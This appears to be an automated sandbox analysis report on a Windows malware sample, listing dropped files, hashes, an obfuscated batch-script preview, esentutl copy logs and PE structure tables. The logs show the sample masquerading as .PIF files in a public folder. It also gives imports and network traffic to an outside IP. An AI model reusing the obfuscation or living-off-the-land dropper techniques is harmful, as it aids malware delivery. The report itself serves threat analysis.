                                                                                                                SHA-512:72901ADDE38F50CF6D74743C0A546C0FEA8B1CD4A18449048A0758A7593A176FC33AAD1EBFD955775EEFC2B30532BCC18E4F2964B3731B668DD87D94405951F7
                                                                                                                Malicious:false
                                                                                                                Preview:@echo off..@echo off..@%.......%e%..%c%...%h%.... ...%o%........% %.%o%.....%f%...%f% ........%..s%.%e%.... %t%r.o......% %....%"%.........%l%.......o.%V%......%W%.....o%a%..........%=%.o....%s%. .o%e%. ....... %t%.% %..%"%.r%..%lVWa%"%......%u%. .%p%.%w%.... %u%.... o...%=%..... %=%... . . %"%.%..%lVWa%"%....%R%.%b%. .... %U%. %p%.%z%...%n% ...%n%...%f%..... . ..%W%.......%i%......%%upwu%C%. .. %l%...%o%........%a%......%"% .... %..%lVWa%"% %r%......%M%....%S%...r... ..%o%....... .%w%.....%X%.....rr%I%..... .
                                                                                                                Process:C:\Users\user\Desktop\EPTMAcgvNZ.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):68096
                                                                                                                Entropy (8bit):6.328046551801531
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:1536:lR2rJpByeL+39Ua1ITgA8wpuO5CU4GGMGcT4idU:lR2lg9Ua1egkCU60U
                                                                                                                MD5:C116D3604CEAFE7057D77FF27552C215
                                                                                                                SHA1:452B14432FB5758B46F2897AECCD89F7C82A727D
                                                                                                                SHA-256:7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
                                                                                                                SHA-512:9202A00EEAF4C5BE94DE32FD41BFEA40FC32D368955D49B7BAD2B5C23C4EBC92DCCB37D99F5A14E53AD674B63F1BAA6EFB1FEB27225C86693EAD3262A26D66C6
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                Joe Sandbox View:
                                                                                                                • Filename: C6dAUcOA6M.exe, Detection: malicious, Browse
                                                                                                                • Filename: 2jbMIxCFsK.exe, Detection: malicious, Browse
                                                                                                                • Filename: qqig1mHX8U.exe, Detection: malicious, Browse
                                                                                                                • Filename: RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat, Detection: malicious, Browse
                                                                                                                • Filename: IBKB.vbs, Detection: malicious, Browse
                                                                                                                • Filename: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd, Detection: malicious, Browse
                                                                                                                • Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd, Detection: malicious, Browse
                                                                                                                • Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd, Detection: malicious, Browse
                                                                                                                • Filename: x.exe, Detection: malicious, Browse
                                                                                                                • Filename: TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd, Detection: malicious, Browse
                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....8.......................p....................@.............................................. ...................p.......`...............................................................P.......................................................text............................... ..`.data....p.......0..................@....tls.........@......................@....rdata.......P......................@..P.idata.......`......................@..@.edata.......p......................@..@
                                                                                                                Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):236544
                                                                                                                Entropy (8bit):6.4416694948877025
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6144:i4VU52dn+OAdUV0RzCcXkThYrK9qqUtmtime:i4K2B+Ob2h0NXIn
                                                                                                                MD5:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                SHA1:4048488DE6BA4BFEF9EDF103755519F1F762668F
                                                                                                                SHA-256:4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22
                                                                                                                SHA-512:80E127EF81752CD50F9EA2D662DC4D3BF8DB8D29680E75FA5FC406CA22CAFA5C4D89EF2EAC65B486413D3CDD57A2C12A1CB75F65D1E312A717D262265736D1C2
                                                                                                                Malicious:false
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+.l.J.?.J.?.J.?.2(?.J.?.!.>.J.?.!.>.J.?.J.?.K.?.!.>.J.?.!.>.J.?.!.>.J.?.!D?.J.?.!.>.J.?Rich.J.?................PE..L....~.............................. k............@..................................j....@.................................................................p...%...5..T............................................................................text............................... ..`.data...8...........................@....idata...$.......&..................@..@.didat..H...........................@....rsrc...............................@..@.reloc...%...p...&...v..............@..B................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):18944
                                                                                                                Entropy (8bit):5.742964649637377
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:384:PVhNH/TqNcx+5tTAjtn3bPcPwoeGULZbiWBlWjVw:PVhZXx+5tTetLVohULZJgw
                                                                                                                MD5:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                SHA1:FCF4DAD8C4AD101504B1BF47CBBDDBAC36B558A7
                                                                                                                SHA-256:4AAA74F294C15AEB37ADA8185D0DEAD58BD87276A01A814ABC0C4B40545BF2EF
                                                                                                                SHA-512:C613D18511B00FA25FC7B1BDDE10D96DEBB42A99B5AAAB9E9826538D0E229085BB371F0197F6B1086C4F9C605F01E71287FFC5442F701A95D67C232A5F031838
                                                                                                                Malicious:false
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.[...5]..5]..5]..]'.5]..0\..5]..6\..5]..1\..5]..4]Q.5]..4\..5]..=\..5]...]..5]..7\..5]Rich..5]................PE..L....$Z..................*...2......P4.......@....@..................................c....@...... ..........................`a..|....p.. ...............................T............................................`..\............................text....).......*.................. ..`.data........@......................@....idata.......`.......0..............@..@.rsrc... ....p.......<..............@..@.reloc...............F..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):594
                                                                                                                Entropy (8bit):4.679530362953372
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:qn7ZxTz9MEeSbZ7u0wxDDDDDDDDjCaY58O6aYASWXd7TB8NGNY:6xTzuEp7u0wQakQaNt7t8N/
                                                                                                                MD5:752F0BA7EC44AF7D743E1B8711A4C0F0
                                                                                                                SHA1:A034D557D7D79AD6682EB621C95ACF31A9786614
                                                                                                                SHA-256:0A63846682F4C541324E43927B98DD6AC6CE16F2003CBA76E37F4DFBEF87FC1D
                                                                                                                SHA-512:7C782C450D36151BA7A0899D7BD4D93042913CF6B25035AFB4F500EAC1595C16FDC8F62BDFA86CF17485482E630044A356D173105B4915A8692754E8633C4A54
                                                                                                                Malicious:false
                                                                                                                Preview:..Initiating COPY FILE mode..... Source File: C:\Users\user\Desktop\EPTMAcgvNZ.exe...Destination File: C:\\Users\\Public\\Libraries\\Cobsfhiy.PIF...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x13ce00 (1297920) (1 MB)....Total bytes written = 0x13d000 (1298432) (1 MB).......Operation completed successfully in 0.125 seconds.....
                                                                                                                Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):560
                                                                                                                Entropy (8bit):4.530060792873685
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:q6p4xTXWIceSbZ7u0wxDDDDDDDDjCaY5B4aYA/4TB8NGNJ:/p4xT5cp7u0wQakB4aV4t8Nc
                                                                                                                MD5:9BEF8DE54A193A94D9A1EAD191C8984E
                                                                                                                SHA1:30ED4B43C4DE6754E64ED46E18BF0E00FCD138A2
                                                                                                                SHA-256:4205CE0B3465201AA88E0A5C8BE1B503C0BDFA30217BBC47BF5F89370D04FF3B
                                                                                                                SHA-512:416A523D818695D54E30B8261E6D3F60C88C4E9188C3459CCF8AD60773A6DBE2D7C5ABBAABD98CAA329598FCD3FED62FC440313F54AE4027B39F82D6A046BD86
                                                                                                                Malicious:false
                                                                                                                Preview:..Initiating COPY FILE mode..... Source File: C:\\Windows\\System32\\ping.exe...Destination File: C:\\Users\\Public\\xpha.pif...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x4a00 (18944) (0 MB)....Total bytes written = 0x5000 (20480) (0 MB).......Operation completed successfully in 0.94 seconds.....
                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Entropy (8bit):7.351894430686878
                                                                                                                TrID:
                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.81%
                                                                                                                • Windows Screen Saver (13104/52) 0.13%
                                                                                                                • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                File name:EPTMAcgvNZ.exe
                                                                                                                File size:1'297'920 bytes
                                                                                                                MD5:dc614075998696b44ada8a2eed23fc03
                                                                                                                SHA1:911b29ff40b13f6935568153f178867e10946311
                                                                                                                SHA256:059971ff3a7ed8438ae50f1ae60bc161e93c0b32f8a2b3c5a0e56bbfa05d9cd5
                                                                                                                SHA512:abd7c8f466b5c856a1a0862180598fbf32b9854ec4c4d6529c0fc3b45f642f538b2e52a5ad27c913f164b74306240bf84082d2dd69c8998a233c7379b749646b
                                                                                                                SSDEEP:24576:uPHhFG0TMHw0kEWIo7rVTR8XzSz4FMzDVW1SKCDH7:uPBZIMJTmjSmM3UxAH7
                                                                                                                TLSH:B4556A05E3C24D31D9322B3B580EB2ED67192D105B1C6B6AE6B5FA3D6B317D32CB1162
                                                                                                                File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                                Icon Hash:13d8d8d6d6d8f807
                                                                                                                Entrypoint:0x4828b0
                                                                                                                Entrypoint Section:.itext
                                                                                                                Digitally signed:false
                                                                                                                Imagebase:0x400000
                                                                                                                Subsystem:windows gui
                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                DLL Characteristics:
                                                                                                                Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                TLS Callbacks:
                                                                                                                CLR (.Net) Version:
                                                                                                                OS Version Major:4
                                                                                                                OS Version Minor:0
                                                                                                                File Version Major:4
                                                                                                                File Version Minor:0
                                                                                                                Subsystem Version Major:4
                                                                                                                Subsystem Version Minor:0
                                                                                                                Import Hash:f2d415c3d34c0a24d257d94e8f95599e
                                                                                                                Instruction
                                                                                                                push ebp
                                                                                                                mov ebp, esp
                                                                                                                add esp, FFFFFFF0h
                                                                                                                mov eax, 00481AACh
                                                                                                                call 00007FA1C4683881h
                                                                                                                mov eax, dword ptr [00491B54h]
                                                                                                                mov eax, dword ptr [eax]
                                                                                                                call 00007FA1C46D5CADh
                                                                                                                mov ecx, dword ptr [00491970h]
                                                                                                                mov eax, dword ptr [00491B54h]
                                                                                                                mov eax, dword ptr [eax]
                                                                                                                mov edx, dword ptr [00481108h]
                                                                                                                call 00007FA1C46D5CADh
                                                                                                                mov eax, dword ptr [00491B54h]
                                                                                                                mov eax, dword ptr [eax]
                                                                                                                call 00007FA1C46D5D21h
                                                                                                                call 00007FA1C4681834h
                                                                                                                lea eax, dword ptr [eax+00h]
                                                                                                                add byte ptr [eax], al

| Name | Virtual Address | Virtual Size | Is in Section |
| --- | --- | --- | --- |
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x96000 | 0x2812 | .idata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xa3000 | 0xa1e00 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x9b000 | 0x786c | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x9a000 | 0x18 | .rdata |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x96750 | 0x638 | .idata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| .text | 0x1000 | 0x80d1c | 0x80e00 | ce9e32a578f605edc36b7ea8c4427908 | False | 0.5213801830746848 | data | 6.567524934010026 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .itext | 0x82000 | 0x8f8 | 0xa00 | d652a5e6b7fe80b40eaa3b2da77699fe | False | 0.5734375 | data | 5.875113409165235 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .data | 0x83000 | 0xece4 | 0xee00 | 92902b2dc8013b896f372dba0ec686b4 | False | 0.26281840861344535 | data | 6.5089029021829345 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .bss | 0x92000 | 0x3afc | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .idata | 0x96000 | 0x2812 | 0x2a00 | 70d29339d31ba0f5bc4fe8f46c8d2d79 | False | 0.30747767857142855 | data | 4.945605499302349 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .tls | 0x99000 | 0x34 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rdata | 0x9a000 | 0x18 | 0x200 | 8f688f4da7785346d6867ce13b4d34ac | False | 0.05078125 | data | 0.2108262677871819 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x9b000 | 0x786c | 0x7a00 | 51d6abfc6b6519b195c4c65d65564755 | False | 0.6299628586065574 | data | 6.669232989160023 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
| .rsrc | 0xa3000 | 0xa1e00 | 0xa1e00 | bbe37615e620d624d6bab28e8432c47f | False | 0.6572876447876448 | data | 7.53541735334072 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
| --- | --- | --- | --- | --- | --- | --- |
| RT_CURSOR | 0xa3b5c | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635 |
| RT_CURSOR | 0xa3c90 | 0x134 | data | English | United States | 0.4642857142857143 |
| RT_CURSOR | 0xa3dc4 | 0x134 | data | English | United States | 0.4805194805194805 |
| RT_CURSOR | 0xa3ef8 | 0x134 | data | English | United States | 0.38311688311688313 |
| RT_CURSOR | 0xa402c | 0x134 | data | English | United States | 0.36038961038961037 |
| RT_CURSOR | 0xa4160 | 0x134 | data | English | United States | 0.4090909090909091 |
| RT_CURSOR | 0xa4294 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4967532467532468 |
| RT_BITMAP | 0xa43c8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066 |
| RT_BITMAP | 0xa4598 | 0x1e4 | Device independent bitmap graphic, 36 x 19 x 4, image size 380 | English | United States | 0.46487603305785125 |
| RT_BITMAP | 0xa477c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066 |
| RT_BITMAP | 0xa494c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39870689655172414 |
| RT_BITMAP | 0xa4b1c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.4245689655172414 |
| RT_BITMAP | 0xa4cec | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5021551724137931 |
| RT_BITMAP | 0xa4ebc | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5064655172413793 |
| RT_BITMAP | 0xa508c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105 |
| RT_BITMAP | 0xa525c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5344827586206896 |
| RT_BITMAP | 0xa542c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105 |
| RT_BITMAP | 0xa55fc | 0x99eac | Device independent bitmap graphic, 585 x 359 x 24, image size 630404, resolution 2835 x 2835 px/m | English | United States | 0.6784155293729499 |
| RT_BITMAP | 0x13f4a8 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | English | United States | 0.4870689655172414 |
| RT_ICON | 0x13f590 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | | | 0.15173410404624277 |
| RT_ICON | 0x13faf8 | 0x1a68 | Device independent bitmap graphic, 40 x 80 x 32, image size 6720 | | | 0.06405325443786983 |
| RT_ICON | 0x141560 | 0x6b8 | Device independent bitmap graphic, 20 x 40 x 32, image size 1680 | | | 0.15930232558139534 |
| RT_ICON | 0x141c18 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | | | 0.17907801418439717 |
| RT_DIALOG | 0x142080 | 0x52 | data | | | 0.7682926829268293 |
| RT_DIALOG | 0x1420d4 | 0x52 | data | | | 0.7560975609756098 |
| RT_STRING | 0x142128 | 0x2e0 | data | | | 0.4592391304347826 |
| RT_STRING | 0x142408 | 0xdc | data | | | 0.6545454545454545 |
| RT_STRING | 0x1424e4 | 0xd8 | data | | | 0.6574074074074074 |
| RT_STRING | 0x1425bc | 0x108 | data | | | 0.6174242424242424 |
| RT_STRING | 0x1426c4 | 0x448 | data | | | 0.40145985401459855 |
| RT_STRING | 0x142b0c | 0x394 | data | | | 0.3864628820960699 |
| RT_STRING | 0x142ea0 | 0x354 | data | | | 0.4014084507042254 |
| RT_STRING | 0x1431f4 | 0x3cc | data | | | 0.33539094650205764 |
| RT_STRING | 0x1435c0 | 0x214 | data | | | 0.49624060150375937 |
| RT_STRING | 0x1437d4 | 0xcc | data | | | 0.6274509803921569 |
| RT_STRING | 0x1438a0 | 0x194 | data | | | 0.5643564356435643 |
| RT_STRING | 0x143a34 | 0x3c4 | data | | | 0.3288381742738589 |
| RT_STRING | 0x143df8 | 0x338 | data | | | 0.42961165048543687 |
| RT_STRING | 0x144130 | 0x294 | data | | | 0.42424242424242425 |
| RT_RCDATA | 0x1443c4 | 0x10 | data | | | 1.5 |
| RT_RCDATA | 0x1443d4 | 0x340 | data | | | 0.6887019230769231 |
| RT_RCDATA | 0x144714 | 0x51e | Delphi compiled form 'TMainForm' | | | 0.48931297709923666 |
| RT_GROUP_CURSOR | 0x144c34 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25 |
| RT_GROUP_CURSOR | 0x144c48 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25 |
| RT_GROUP_CURSOR | 0x144c5c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3 |
| RT_GROUP_CURSOR | 0x144c70 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3 |
| RT_GROUP_CURSOR | 0x144c84 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3 |
| RT_GROUP_CURSOR | 0x144c98 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3 |
| RT_GROUP_CURSOR | 0x144cac | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3 |
| RT_GROUP_ICON | 0x144cc0 | 0x3e | data | | | 0.9032258064516129 |

| DLL | Import |
| --- | --- |
| oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen |
| advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey |
| user32.dll | GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA |
| kernel32.dll | GetACP, Sleep, VirtualFree, VirtualAlloc, GetTickCount, QueryPerformanceCounter, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, ExitThread, CreateThread, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle |
| kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA |
| user32.dll | CreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout |
| gdi32.dll | UnrealizeObject, StretchDIBits, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetPaletteEntries, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RestoreDC, ResizePalette, Rectangle, RectVisible, RealizePalette, Polyline, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetNearestPaletteIndex, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt |
| version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA |
| kernel32.dll | lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SuspendThread, Sleep, SizeofResource, SetThreadPriority, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryExA, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetExitCodeThread, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedIncrement, InterlockedExchange, InterlockedDecrement, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle |
| advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey |
| kernel32.dll | Sleep |
| oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit |
| comctl32.dll | _TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls |

| Language of compilation system | Country where language is spoken | Map |
| --- | --- | --- |
| English | United States | |
                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                Nov 26, 2024 08:24:46.187500000 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:46.187516928 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.187534094 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:46.187552929 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:46.187558889 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.235424042 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:46.371871948 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.371891022 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.371932983 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.371983051 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:46.372016907 CET4434970316.182.70.225192.168.2.7
